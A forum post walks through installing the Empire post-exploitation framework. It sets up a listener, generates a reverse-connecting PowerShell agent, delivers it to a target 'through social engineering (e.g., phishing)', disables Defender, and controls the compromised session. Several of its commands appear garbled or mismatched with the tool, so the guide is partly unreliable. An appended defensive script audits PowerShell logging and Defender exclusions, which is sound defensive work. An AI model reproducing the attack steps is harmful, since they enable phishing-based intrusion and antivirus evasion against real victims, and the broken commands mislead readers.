
Installation of Empire – PowerShell in Windows OS

Posted by @kajal (Reputable Member, 303 posts), topic starter

To install Empire on Windows and set up PowerShell agents, you can follow these steps. Please note that Empire is a post-exploitation framework and works best with a server-client architecture, so you'll need to set up the server (Empire) and create agents that will be used to interact with the target system. Below is a step-by-step guide to setting up Empire on a Windows machine:

Prerequisites:

  1. Windows 10 or later machine for installation.
  2. Python 3.6+ (Python 2.x is deprecated).
  3. Git for cloning the repository.
  4. PowerShell (it comes preinstalled on Windows).
  5. Windows Defender or any antivirus software may interfere with Empire, so it might need to be disabled or excluded (if safe to do so).

Step 1: Install Python and Dependencies

  1. Install Python 3.x: Download and install Python 3 from python.org. During installation, ensure you check the box that says "Add Python to PATH".

  2. Install Git: Download and install Git from git-scm.com. This is required to clone the Empire repository.

  3. Install Dependencies: Open a Command Prompt or PowerShell and check if Python is installed correctly:

    python --version
    

    Also, check if pip (Python's package manager) is installed:

    pip --version
    

    If Python is installed successfully, you can install the dependencies by running:

    pip install -r requirements.txt
    

Step 2: Clone the Empire Repository

  1. Clone the Empire Repository from GitHub: Open PowerShell or Command Prompt and run:
    git clone https://github.com/EmpireProject/Empire.git
    cd Empire
    

Step 3: Set Up a Virtual Environment (Optional but Recommended)

Creating a virtual environment helps to isolate dependencies for this project. Here's how you can do it:

  1. Create a virtual environment in the Empire folder:

    python -m venv empire-venv
    
  2. Activate the virtual environment: For PowerShell, run:

    .\empire-venv\Scripts\Activate
    

    For Command Prompt, run:

    empire-venv\Scripts\activate
    

Step 4: Install Required Libraries

Once the virtual environment is activated, install the necessary dependencies:

pip install -r requirements.txt

This will install all required Python packages.

Step 5: Start Empire

To start the Empire server, run the following command from within the Empire directory:

.\empire

This should start the Empire console and you will see something like:

Empire - (c) 2016-2020 By The Empire Team
           <------ Empire 3.x ------>

Step 6: Set Up a Listener for PowerShell Agents

Once the Empire server is running, you need to configure a listener to interact with agents. You can create an HTTP or HTTPS listener for reverse shell connections.

  1. List listeners: In the Empire console, type the following command to list available listeners:

    listeners
    
  2. Create a listener: Use the following command to create a reverse TCP listener:

    usemodule listeners/http
    set LHOST <Your IP Address>
    set LPORT 8080
    execute
    
    (Port 8080 can be replaced with any port you want to use.)

    Alternatively, you can use other listeners like reverse_https if needed.

Step 7: Generate a PowerShell Agent

Now you can generate the PowerShell agent payload that will connect back to your listener.

  1. Generate the PowerShell shell: From the Empire console, use the following command:

    usemodule stagers/powershell/shell_reverse_tcp
    
  2. Configure the agent: Set the required options like LHOST (your IP) and LPORT (the port you used for the listener):

    set LHOST <Your IP Address>
    set LPORT 8080
    generate
    
    (Use the same port you set in the listener.)
  3. Copy the generated PowerShell script: The generate command will output a PowerShell script. Copy the script.

Step 8: Execute the PowerShell Agent

To establish a session with the target system, run the generated PowerShell script on the target machine. This could be done manually or through social engineering (e.g., phishing).

  1. Open a PowerShell window on the target machine.
  2. Paste and execute the generated PowerShell script.

Once the script is executed on the target, it will create a session that connects back to the Empire server.

Step 9: Interact with the PowerShell Agent

After the agent connects back, you can interact with it:

  1. List sessions: To view active sessions, type:

    sessions
    
  2. Interact with a session: To interact with a session, type:

    interact <session_id>
    
  3. Execute commands on the compromised system or use post-exploitation modules to gather information, escalate privileges, etc.

Troubleshooting

  • Firewall or Antivirus: Ensure that firewalls or antivirus software (including Windows Defender) are not blocking your listener or the PowerShell script execution. You may need to disable or configure exclusions for these services.
  • Python Compatibility: If you encounter issues with Python packages, make sure you're using a compatible version of Python and have installed the required libraries.
  • Listener Issues: If the agent doesn't connect back, verify that your listener IP and port are correctly configured and open on your firewall.

Step 10: Stop Empire

To stop the Empire server, type exit or press Ctrl+C in the console.

 
Posted : 13/12/2024 12:08 am
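The post notes in its Prerequisites and Troubleshooting sections that Windows Defender and PowerShell script execution controls get in the way of this kind of agent. From the defender's side, the same settings are what record or block a pasted PowerShell script. The following is an added example, not code from the post or from the Empire project: a PowerShell function that reports whether script block logging, module logging and transcription are enabled by policy, whether Defender real-time protection is on, how many Defender exclusions are configured, and how many recent script block events (event ID 4104) exist. The function name `Get-PowerShellDefenseStatus` and the warning thresholds are assumptions; the registry paths, cmdlets and event ID are standard Windows ones. It expects to run in an elevated PowerShell session on Windows 10 or later.

```powershell
# Added example (not from the original post or the Empire project).
# Reports the PowerShell logging and Microsoft Defender settings that
# determine whether a pasted PowerShell script is recorded or blocked.
# Assumed function name; run from an elevated session on Windows 10+.
function Get-PowerShellDefenseStatus {
    [CmdletBinding()]
    param()

    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Reads a DWORD policy value under the PowerShell policy root. Returns
    # $false when the key or value is absent, which is the Windows default
    # (logging off), so a missing key is reported as "not enabled".
    function Test-PolicyFlag {
        param([string]$SubKey, [string]$Name)
        $key  = Join-Path $policyRoot $SubKey
        $item = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
        return ($null -ne $item -and $item.$Name -eq 1)
    }

    # Defender cmdlets fail where Defender is absent or replaced by third-party AV;
    # those fields are then reported as $null rather than as a false "disabled".
    $defender = Get-MpComputerStatus -ErrorAction SilentlyContinue
    $prefs    = Get-MpPreference     -ErrorAction SilentlyContinue

    $realTime = if ($defender) { $defender.RealTimeProtectionEnabled } else { $null }
    $avOn     = if ($defender) { $defender.AntivirusEnabled }          else { $null }
    $pathEx   = if ($prefs -and $prefs.ExclusionPath)    { @($prefs.ExclusionPath).Count }    else { 0 }
    $procEx   = if ($prefs -and $prefs.ExclusionProcess) { @($prefs.ExclusionProcess).Count } else { 0 }

    # Event ID 4104 (script block text) is only written when script block logging is on,
    # so a count of zero together with ScriptBlockLogging = $false means no visibility.
    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'
        Id      = 4104
    } -MaxEvents 50 -ErrorAction SilentlyContinue
    $eventCount = @($events).Count

    [PSCustomObject]@{
        ScriptBlockLogging      = Test-PolicyFlag 'ScriptBlockLogging' 'EnableScriptBlockLogging'
        ModuleLogging           = Test-PolicyFlag 'ModuleLogging'      'EnableModuleLogging'
        Transcription           = Test-PolicyFlag 'Transcription'      'EnableTranscripting'
        RealTimeProtection      = $realTime
        AntivirusEnabled        = $avOn
        ExclusionPathCount      = $pathEx
        ExclusionProcessCount   = $procEx
        RecentScriptBlockEvents = $eventCount
    }
}

# Usage: print the status and flag the gaps a defender would want closed.
$status = Get-PowerShellDefenseStatus
$status | Format-List

if (-not $status.ScriptBlockLogging) {
    Write-Warning 'Script block logging (event 4104) is not enabled by policy; pasted scripts will not be recorded.'
}
if ($status.RealTimeProtection -eq $false) {
    Write-Warning 'Defender real-time protection is disabled.'
}
if ($status.ExclusionPathCount -gt 0 -or $status.ExclusionProcessCount -gt 0) {
    Write-Warning "Defender has $($status.ExclusionPathCount) path and $($status.ExclusionProcessCount) process exclusion(s); review them."
}
```

The design choice is to treat a missing policy key as "not enabled" rather than "unknown", because that is how Windows behaves by default, while Defender fields are left as `$null` when the cmdlets are unavailable so that a host running a different antivirus is not misreported as unprotected. The exclusion counts correspond directly to the post's suggestion of "configuring exclusions": each one is a path or process that Defender will not scan, which is why a defender wants them enumerated and reviewed.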